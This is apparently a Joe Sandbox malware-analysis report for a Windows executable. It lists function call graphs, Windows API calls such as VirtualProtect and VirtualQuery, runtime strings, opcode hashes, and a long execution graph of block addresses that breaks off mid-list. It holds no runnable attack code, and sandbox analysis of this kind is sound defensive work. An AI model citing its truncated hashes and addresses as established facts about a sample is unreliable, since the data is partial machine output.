                                                      • Instruction Fuzzy Hash: 08534763C3CAC385F7628B29E8023F47760BF95384F645236D98CE65A6EF6D6685C304

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                      • String ID: 0$7%2h$X$`
                                                      • API String ID: 329590056-1471948811
                                                      • Opcode ID: b95cf91eda7b68f57c5181f3b1c7e46db98f7d87f2357bb82c327b923f2a006a
                                                      • Instruction ID: 7cb5da8273c477d9315efdbaaba4c0184dcc189e27506203a10f45e0001622ba
                                                      • Opcode Fuzzy Hash: b95cf91eda7b68f57c5181f3b1c7e46db98f7d87f2357bb82c327b923f2a006a
                                                      • Instruction Fuzzy Hash: 18027C33928B8285E7608F19F8443AA77A0FB857A4F104235DAADA77E6DF7CD185C700

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID: memset$wcscatwcscpywcslen
                                                      • String ID: $0$0$@$@
                                                      • API String ID: 4263182637-1413854666
                                                      • Opcode ID: 1162d33619bbb34c0f2e9a143d3f60e9be2465dce8d2f97103770710023d22b8
                                                      • Instruction ID: 6bee4029f933c954658aba3329d587ac4982d39fffe988f5890f9975b0bbaa9e
                                                      • Opcode Fuzzy Hash: 1162d33619bbb34c0f2e9a143d3f60e9be2465dce8d2f97103770710023d22b8
                                                      • Instruction Fuzzy Hash: 52B18F2292CBC285F3618B24F4453FA77A0FF85344F505235EA8DA6AA6DF7DD586CB00

                                                      Control-flow Graph

                                                      APIs
                                                      • VirtualQuery.KERNEL32(?,?,?,?,00007FF67C75A4A8,00007FF67C75A4A8,?,?,00007FF67C750000,?,00007FF67C751991), ref: 00007FF67C751C63
                                                      • VirtualProtect.KERNEL32(?,?,?,?,00007FF67C75A4A8,00007FF67C75A4A8,?,?,00007FF67C750000,?,00007FF67C751991), ref: 00007FF67C751CC7
                                                      • memcpy.MSVCRT ref: 00007FF67C751CE0
                                                      • GetLastError.KERNEL32(?,?,?,?,00007FF67C75A4A8,00007FF67C75A4A8,?,?,00007FF67C750000,?,00007FF67C751991), ref: 00007FF67C751D23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                      • API String ID: 2595394609-2123141913
                                                      • Opcode ID: a73c2b82d557c5aae947ae703203d5278343e9bd1baf2771f34c60c14f44de3e
                                                      • Instruction ID: a6f2abc7ac449c49be9a48e31757509a47f163fc7312a81860c8b6f5dad259db
                                                      • Opcode Fuzzy Hash: a73c2b82d557c5aae947ae703203d5278343e9bd1baf2771f34c60c14f44de3e
                                                      • Instruction Fuzzy Hash: 99416FA3A29A4682EF918B45F8446B837A0FB85B91F554136CE0DD77A1DE3DE9C6C300

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                      • String ID:
                                                      • API String ID: 3326252324-0
                                                      • Opcode ID: ebbd2e3b6cbfeac7cc2dca93027932662f1a6492cb86fc1cea6d36530fcbbc00
                                                      • Instruction ID: ad042ed42800d9b4f4c2d0a4c0c5de2d4fee5fb78006d79a92af5cbadc8ab652
                                                      • Opcode Fuzzy Hash: ebbd2e3b6cbfeac7cc2dca93027932662f1a6492cb86fc1cea6d36530fcbbc00
                                                      • Instruction Fuzzy Hash: 6E21EA27E39D1286FBAA9B11F9403792360FF14BA0F565471C90ED7AE5DF2CA8C68340

                                                      Control-flow Graph

                                                      control_flow_graph for the function at 7ff67c751e10 (executed / not-executed colouring lost in extraction): basic blocks 7ff67c751e10 through 7ff67c751f69; signal is called at 7ff67c751ed3, 7ff67c751eea and 7ff67c751f12, and 7ff67c7589b0 is called from block 7ff67c751efb. Edge list omitted.
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CCG
                                                      • API String ID: 0-1584390748
                                                      • Opcode ID: 4a7ae61e09f356dcb3ca58e8778bf02f31e9e28ceccf92203711060f4d615a68
                                                      • Instruction ID: 1bedd5d5aab1290c1cb762b201dedee19112597569ab22131c1d56ec6d308a85
                                                      • Opcode Fuzzy Hash: 4a7ae61e09f356dcb3ca58e8778bf02f31e9e28ceccf92203711060f4d615a68
                                                      • Instruction Fuzzy Hash: 1621BE23F2E50643FB754228FA9077921819F887A6F298531DE1EC33D5DF2EACC28241

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph: graph rendering omitted; basic blocks 7ff67c751880 through 7ff67c751b98, annotated with VirtualProtect and calls to 7ff67c752420, 7ff67c752660, 7ff67c751ba0 and 7ff67c751d40
                                                      APIs
                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67C751247), ref: 00007FF67C7519F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                      • API String ID: 544645111-395989641
                                                      • Opcode ID: 2650d536b62deb3d9d47a44c5ad09f6013c99e194f6b6cbe57e8081442e2c579
                                                      • Instruction ID: 575846692ff0de880d7a5c7aec972b14051506dd5f555ceac28dbdd0641a5390
                                                      • Opcode Fuzzy Hash: 2650d536b62deb3d9d47a44c5ad09f6013c99e194f6b6cbe57e8081442e2c579
                                                      • Instruction Fuzzy Hash: CC517B77F28986D6EB508B25E8407B83761BB04BA5F588231D92C877A5CF3CE9C2C700

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph: graph rendering omitted; basic blocks 7ff67c751800 through 7ff67c751867, annotated with fprintf and a call to 7ff67c752290
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID: fprintf
                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                      • API String ID: 383729395-3474627141
                                                      • Opcode ID: b9775bf2c7c001ade3725bf189e2567a0e069ce32717a9dee567922b84cc9567
                                                      • Instruction ID: 43e02ae41001bbde221f69f1e21ff0fa4869bfbb59bffbb831b9f3aa9710c6d4
                                                      • Opcode Fuzzy Hash: b9775bf2c7c001ade3725bf189e2567a0e069ce32717a9dee567922b84cc9567
                                                      • Instruction Fuzzy Hash: 5EF09013E28A9583E721AB25F9410BDA361EB597D1F509235EE4EE7651DF2CF5C2C300

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                      • String ID:
                                                      • API String ID: 682475483-0
                                                      • Opcode ID: 2996161744fd7a7c03ea6c4091c9ef3f11398d7dc2e98130c39f15d04475f55c
                                                      • Instruction ID: 441f2a60c7e1a8fd496d8bd20f71be395cf48342eaa76a0a4deafa9e56608637
                                                      • Opcode Fuzzy Hash: 2996161744fd7a7c03ea6c4091c9ef3f11398d7dc2e98130c39f15d04475f55c
                                                      • Instruction Fuzzy Hash: E701EC27A2990296F7569B21FE042792670FF14BE0F555435CA0ED7A94DF2CB9D68300

                                                      Execution Graph

                                                      Execution Coverage: 3.5%
                                                      Dynamic/Decrypted Code Coverage: 0%
                                                      Signature Coverage: 0%
                                                      Total number of Nodes: 1660
                                                      Total number of Limit Nodes: 2
                                                      execution_graph: graph rendering omitted; nodes are basic-block addresses in the image based at 7ff62d5f0000, annotated with EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, TlsGetValue, GetLastError, signal, VirtualProtect, VirtualQuery, Sleep, SetUnhandledExceptionFilter, _amsg_exit, _initterm, _cexit, malloc, free, memcpy, memset, strlen, wcslen, wcscpy, wcscat, _wcsicmp and _wcsnicmp; the graph text is truncated in the source
7ff62d5f1512 3506->3507 3508 7ff62d5f1394 2 API calls 3507->3508 3509 7ff62d5f1521 3508->3509 3510 7ff62d5f1530 3509->3510 3511 7ff62d5f1394 2 API calls 3509->3511 3512 7ff62d5f1394 2 API calls 3510->3512 3511->3510 3513 7ff62d5f153a 3512->3513 3514 7ff62d5f153f 3513->3514 3515 7ff62d5f1394 2 API calls 3513->3515 3516 7ff62d5f1394 2 API calls 3514->3516 3515->3514 3517 7ff62d5f154e 3516->3517 3518 7ff62d5f1394 2 API calls 3517->3518 3519 7ff62d5f1558 3518->3519 3520 7ff62d5f155d 3519->3520 3521 7ff62d5f1394 2 API calls 3519->3521 3522 7ff62d5f1394 2 API calls 3520->3522 3521->3520 3523 7ff62d5f1567 3522->3523 3524 7ff62d5f156c 3523->3524 3525 7ff62d5f1394 2 API calls 3523->3525 3526 7ff62d5f1394 2 API calls 3524->3526 3525->3524 3527 7ff62d5f1576 3526->3527 3528 7ff62d5f157b 3527->3528 3529 7ff62d5f1394 2 API calls 3527->3529 3530 7ff62d5f1394 2 API calls 3528->3530 3529->3528 3531 7ff62d5f1585 3530->3531 3532 7ff62d5f158a 3531->3532 3533 7ff62d5f1394 2 API calls 3531->3533 3534 7ff62d5f1394 2 API calls 3532->3534 3533->3532 3535 7ff62d5f1599 3534->3535 3536 7ff62d5f1394 2 API calls 3535->3536 3537 7ff62d5f15a3 3536->3537 3538 7ff62d5f15a8 3537->3538 3539 7ff62d5f1394 2 API calls 3537->3539 3540 7ff62d5f1394 2 API calls 3538->3540 3539->3538 3541 7ff62d5f15b7 3540->3541 3542 7ff62d5f1394 2 API calls 3541->3542 3543 7ff62d5f15c1 3542->3543 3544 7ff62d5f1394 2 API calls 3543->3544 3545 7ff62d5f15c6 3544->3545 3546 7ff62d5f1394 2 API calls 3545->3546 3547 7ff62d5f15d5 3546->3547 3548 7ff62d5f1394 2 API calls 3547->3548 3549 7ff62d5f15e4 3548->3549 3550 7ff62d5f1394 2 API calls 3549->3550 3551 7ff62d5f15f3 3550->3551 3551->2946 3552 7ff62d5f1440 3551->3552 3553 7ff62d5f1394 2 API calls 3552->3553 3554 7ff62d5f144f 3553->3554 3555 7ff62d5f1394 2 API calls 3554->3555 3556 7ff62d5f1459 3555->3556 3557 7ff62d5f145e 3556->3557 3558 7ff62d5f1394 2 API calls 3556->3558 3559 7ff62d5f1394 2 API calls 3557->3559 3558->3557 3560 7ff62d5f1468 3559->3560 3561 7ff62d5f146d 
3560->3561 3562 7ff62d5f1394 2 API calls 3560->3562 3563 7ff62d5f1394 2 API calls 3561->3563 3562->3561 3564 7ff62d5f1477 3563->3564 3565 7ff62d5f147c 3564->3565 3566 7ff62d5f1394 2 API calls 3564->3566 3567 7ff62d5f1394 2 API calls 3565->3567 3566->3565 3568 7ff62d5f1486 3567->3568 3569 7ff62d5f148b 3568->3569 3570 7ff62d5f1394 2 API calls 3568->3570 3571 7ff62d5f1394 2 API calls 3569->3571 3570->3569 3572 7ff62d5f1495 3571->3572 3573 7ff62d5f149a 3572->3573 3574 7ff62d5f1394 2 API calls 3572->3574 3575 7ff62d5f1394 2 API calls 3573->3575 3574->3573 3576 7ff62d5f14a4 3575->3576 3577 7ff62d5f14a9 3576->3577 3578 7ff62d5f1394 2 API calls 3576->3578 3579 7ff62d5f1394 2 API calls 3577->3579 3578->3577 3580 7ff62d5f14b3 3579->3580 3581 7ff62d5f1394 2 API calls 3580->3581 3582 7ff62d5f14b8 3581->3582 3583 7ff62d5f1394 2 API calls 3582->3583 3584 7ff62d5f14c7 3583->3584 3585 7ff62d5f1394 2 API calls 3584->3585 3586 7ff62d5f14d6 3585->3586 3587 7ff62d5f1394 2 API calls 3586->3587 3588 7ff62d5f14e5 3587->3588 3589 7ff62d5f1394 2 API calls 3588->3589 3590 7ff62d5f14f4 3589->3590 3591 7ff62d5f1394 2 API calls 3590->3591 3592 7ff62d5f1503 3591->3592 3593 7ff62d5f1394 2 API calls 3592->3593 3594 7ff62d5f1512 3593->3594 3595 7ff62d5f1394 2 API calls 3594->3595 3596 7ff62d5f1521 3595->3596 3597 7ff62d5f1530 3596->3597 3598 7ff62d5f1394 2 API calls 3596->3598 3599 7ff62d5f1394 2 API calls 3597->3599 3598->3597 3600 7ff62d5f153a 3599->3600 3601 7ff62d5f153f 3600->3601 3602 7ff62d5f1394 2 API calls 3600->3602 3603 7ff62d5f1394 2 API calls 3601->3603 3602->3601 3604 7ff62d5f154e 3603->3604 3605 7ff62d5f1394 2 API calls 3604->3605 3606 7ff62d5f1558 3605->3606 3607 7ff62d5f155d 3606->3607 3608 7ff62d5f1394 2 API calls 3606->3608 3609 7ff62d5f1394 2 API calls 3607->3609 3608->3607 3610 7ff62d5f1567 3609->3610 3611 7ff62d5f156c 3610->3611 3612 7ff62d5f1394 2 API calls 3610->3612 3613 7ff62d5f1394 2 API calls 3611->3613 3612->3611 3614 7ff62d5f1576 3613->3614 3615 7ff62d5f157b 3614->3615 
3616 7ff62d5f1394 2 API calls 3614->3616 3617 7ff62d5f1394 2 API calls 3615->3617 3616->3615 3618 7ff62d5f1585 3617->3618 3619 7ff62d5f158a 3618->3619 3620 7ff62d5f1394 2 API calls 3618->3620 3621 7ff62d5f1394 2 API calls 3619->3621 3620->3619 3622 7ff62d5f1599 3621->3622 3623 7ff62d5f1394 2 API calls 3622->3623 3624 7ff62d5f15a3 3623->3624 3625 7ff62d5f15a8 3624->3625 3626 7ff62d5f1394 2 API calls 3624->3626 3627 7ff62d5f1394 2 API calls 3625->3627 3626->3625 3628 7ff62d5f15b7 3627->3628 3629 7ff62d5f1394 2 API calls 3628->3629 3630 7ff62d5f15c1 3629->3630 3631 7ff62d5f1394 2 API calls 3630->3631 3632 7ff62d5f15c6 3631->3632 3633 7ff62d5f1394 2 API calls 3632->3633 3634 7ff62d5f15d5 3633->3634 3635 7ff62d5f1394 2 API calls 3634->3635 3636 7ff62d5f15e4 3635->3636 3637 7ff62d5f1394 2 API calls 3636->3637 3638 7ff62d5f15f3 3637->3638 3638->2946 3638->2956 3640 7ff62d5f35c1 memset 3639->3640 3650 7ff62d5f33c3 3639->3650 3642 7ff62d5f35e6 3640->3642 3641 7ff62d5f343a memset 3641->3650 3643 7ff62d5f362b wcscpy wcscat wcslen 3642->3643 3644 7ff62d5f1422 2 API calls 3643->3644 3646 7ff62d5f3728 3644->3646 3645 7ff62d5f3493 wcscpy wcscat wcslen 3952 7ff62d5f1422 3645->3952 3648 7ff62d5f3767 3646->3648 4047 7ff62d5f1431 3646->4047 3655 7ff62d5f14c7 3648->3655 3650->3640 3650->3641 3650->3645 3652 7ff62d5f145e 2 API calls 3650->3652 3654 7ff62d5f3579 3650->3654 3652->3650 3653 7ff62d5f145e 2 API calls 3653->3648 3654->3640 3656 7ff62d5f1394 2 API calls 3655->3656 3657 7ff62d5f14d6 3656->3657 3658 7ff62d5f1394 2 API calls 3657->3658 3659 7ff62d5f14e5 3658->3659 3660 7ff62d5f1394 2 API calls 3659->3660 3661 7ff62d5f14f4 3660->3661 3662 7ff62d5f1394 2 API calls 3661->3662 3663 7ff62d5f1503 3662->3663 3664 7ff62d5f1394 2 API calls 3663->3664 3665 7ff62d5f1512 3664->3665 3666 7ff62d5f1394 2 API calls 3665->3666 3667 7ff62d5f1521 3666->3667 3668 7ff62d5f1530 3667->3668 3669 7ff62d5f1394 2 API calls 3667->3669 3670 7ff62d5f1394 2 API calls 3668->3670 3669->3668 3671 7ff62d5f153a 
3670->3671 3672 7ff62d5f153f 3671->3672 3673 7ff62d5f1394 2 API calls 3671->3673 3674 7ff62d5f1394 2 API calls 3672->3674 3673->3672 3675 7ff62d5f154e 3674->3675 3676 7ff62d5f1394 2 API calls 3675->3676 3677 7ff62d5f1558 3676->3677 3678 7ff62d5f155d 3677->3678 3679 7ff62d5f1394 2 API calls 3677->3679 3680 7ff62d5f1394 2 API calls 3678->3680 3679->3678 3681 7ff62d5f1567 3680->3681 3682 7ff62d5f156c 3681->3682 3683 7ff62d5f1394 2 API calls 3681->3683 3684 7ff62d5f1394 2 API calls 3682->3684 3683->3682 3685 7ff62d5f1576 3684->3685 3686 7ff62d5f157b 3685->3686 3687 7ff62d5f1394 2 API calls 3685->3687 3688 7ff62d5f1394 2 API calls 3686->3688 3687->3686 3689 7ff62d5f1585 3688->3689 3690 7ff62d5f158a 3689->3690 3691 7ff62d5f1394 2 API calls 3689->3691 3692 7ff62d5f1394 2 API calls 3690->3692 3691->3690 3693 7ff62d5f1599 3692->3693 3694 7ff62d5f1394 2 API calls 3693->3694 3695 7ff62d5f15a3 3694->3695 3696 7ff62d5f15a8 3695->3696 3697 7ff62d5f1394 2 API calls 3695->3697 3698 7ff62d5f1394 2 API calls 3696->3698 3697->3696 3699 7ff62d5f15b7 3698->3699 3700 7ff62d5f1394 2 API calls 3699->3700 3701 7ff62d5f15c1 3700->3701 3702 7ff62d5f1394 2 API calls 3701->3702 3703 7ff62d5f15c6 3702->3703 3704 7ff62d5f1394 2 API calls 3703->3704 3705 7ff62d5f15d5 3704->3705 3706 7ff62d5f1394 2 API calls 3705->3706 3707 7ff62d5f15e4 3706->3707 3708 7ff62d5f1394 2 API calls 3707->3708 3709 7ff62d5f15f3 3708->3709 3709->2972 3711 7ff62d5f2f88 3710->3711 3712 7ff62d5f14a9 2 API calls 3711->3712 3713 7ff62d5f2fd0 3712->3713 3713->2947 3715 7ff62d5f2690 10 API calls 3714->3715 3717 7ff62d5f391e 3715->3717 3716 7ff62d5f3b21 3716->2957 3717->3716 3718 7ff62d5f14a9 2 API calls 3717->3718 3719 7ff62d5f3967 3718->3719 3720 7ff62d5f3b28 3719->3720 4138 7ff62d5f14b8 3719->4138 4407 7ff62d5f15c6 3720->4407 3723 7ff62d5f3a87 memset 4200 7ff62d5f148b 3723->4200 3725 7ff62d5f14b8 2 API calls 3727 7ff62d5f398f 3725->3727 3727->3723 3727->3725 4195 7ff62d5f15d5 3727->4195 3731 7ff62d5f14b8 2 API calls 3732 
7ff62d5f3b07 3731->3732 3732->3720 3733 7ff62d5f3b0b 3732->3733 4334 7ff62d5f147c 3733->4334 3736 7ff62d5f145e 2 API calls 3736->3716 3738 7ff62d5f8410 malloc 3737->3738 3739 7ff62d5f13b8 3738->3739 3740 7ff62d5f13c6 NtRollbackComplete 3739->3740 3740->3014 3742 7ff62d5f266f 3741->3742 3742->3206 3742->3742 3821 7ff62d5f155d 3743->3821 3745 7ff62d5f27f4 3746 7ff62d5f14c7 2 API calls 3745->3746 3747 7ff62d5f2816 3746->3747 3751 7ff62d5f1503 2 API calls 3747->3751 3748 7ff62d5f2785 wcsncmp 3852 7ff62d5f14e5 3748->3852 3752 7ff62d5f283d 3751->3752 3754 7ff62d5f2847 memset 3752->3754 3753 7ff62d5f2d27 3755 7ff62d5f2877 3754->3755 3756 7ff62d5f28bc wcscpy wcscat wcslen 3755->3756 3757 7ff62d5f28ee wcslen 3756->3757 3758 7ff62d5f291a 3756->3758 3757->3758 3759 7ff62d5f2985 3758->3759 3760 7ff62d5f2967 wcslen 3758->3760 3759->3753 3761 7ff62d5f29d9 wcslen 3759->3761 3760->3759 3762 7ff62d5f14a9 2 API calls 3761->3762 3763 7ff62d5f2a73 3762->3763 3764 7ff62d5f14a9 2 API calls 3763->3764 3765 7ff62d5f2bd2 3764->3765 3903 7ff62d5f14f4 3765->3903 3768 7ff62d5f14c7 2 API calls 3769 7ff62d5f2c99 3768->3769 3770 7ff62d5f14c7 2 API calls 3769->3770 3771 7ff62d5f2cb1 3770->3771 3772 7ff62d5f145e 2 API calls 3771->3772 3773 7ff62d5f2cbb 3772->3773 3774 7ff62d5f145e 2 API calls 3773->3774 3775 7ff62d5f2cc5 3774->3775 3775->3209 3777 7ff62d5f1394 2 API calls 3776->3777 3778 7ff62d5f1521 3777->3778 3779 7ff62d5f1530 3778->3779 3780 7ff62d5f1394 2 API calls 3778->3780 3781 7ff62d5f1394 2 API calls 3779->3781 3780->3779 3782 7ff62d5f153a 3781->3782 3783 7ff62d5f153f 3782->3783 3784 7ff62d5f1394 2 API calls 3782->3784 3785 7ff62d5f1394 2 API calls 3783->3785 3784->3783 3786 7ff62d5f154e 3785->3786 3787 7ff62d5f1394 2 API calls 3786->3787 3788 7ff62d5f1558 3787->3788 3789 7ff62d5f155d 3788->3789 3790 7ff62d5f1394 2 API calls 3788->3790 3791 7ff62d5f1394 2 API calls 3789->3791 3790->3789 3792 7ff62d5f1567 3791->3792 3793 7ff62d5f156c 3792->3793 3794 7ff62d5f1394 2 API calls 3792->3794 3795 
7ff62d5f1394 2 API calls 3793->3795 3794->3793 3796 7ff62d5f1576 3795->3796 3797 7ff62d5f157b 3796->3797 3798 7ff62d5f1394 2 API calls 3796->3798 3799 7ff62d5f1394 2 API calls 3797->3799 3798->3797 3800 7ff62d5f1585 3799->3800 3801 7ff62d5f158a 3800->3801 3802 7ff62d5f1394 2 API calls 3800->3802 3803 7ff62d5f1394 2 API calls 3801->3803 3802->3801 3804 7ff62d5f1599 3803->3804 3805 7ff62d5f1394 2 API calls 3804->3805 3806 7ff62d5f15a3 3805->3806 3807 7ff62d5f15a8 3806->3807 3808 7ff62d5f1394 2 API calls 3806->3808 3809 7ff62d5f1394 2 API calls 3807->3809 3808->3807 3810 7ff62d5f15b7 3809->3810 3811 7ff62d5f1394 2 API calls 3810->3811 3812 7ff62d5f15c1 3811->3812 3813 7ff62d5f1394 2 API calls 3812->3813 3814 7ff62d5f15c6 3813->3814 3815 7ff62d5f1394 2 API calls 3814->3815 3816 7ff62d5f15d5 3815->3816 3817 7ff62d5f1394 2 API calls 3816->3817 3818 7ff62d5f15e4 3817->3818 3819 7ff62d5f1394 2 API calls 3818->3819 3820 7ff62d5f15f3 3819->3820 3820->3212 3822 7ff62d5f1394 2 API calls 3821->3822 3823 7ff62d5f1567 3822->3823 3824 7ff62d5f156c 3823->3824 3825 7ff62d5f1394 2 API calls 3823->3825 3826 7ff62d5f1394 2 API calls 3824->3826 3825->3824 3827 7ff62d5f1576 3826->3827 3828 7ff62d5f157b 3827->3828 3829 7ff62d5f1394 2 API calls 3827->3829 3830 7ff62d5f1394 2 API calls 3828->3830 3829->3828 3831 7ff62d5f1585 3830->3831 3832 7ff62d5f158a 3831->3832 3833 7ff62d5f1394 2 API calls 3831->3833 3834 7ff62d5f1394 2 API calls 3832->3834 3833->3832 3835 7ff62d5f1599 3834->3835 3836 7ff62d5f1394 2 API calls 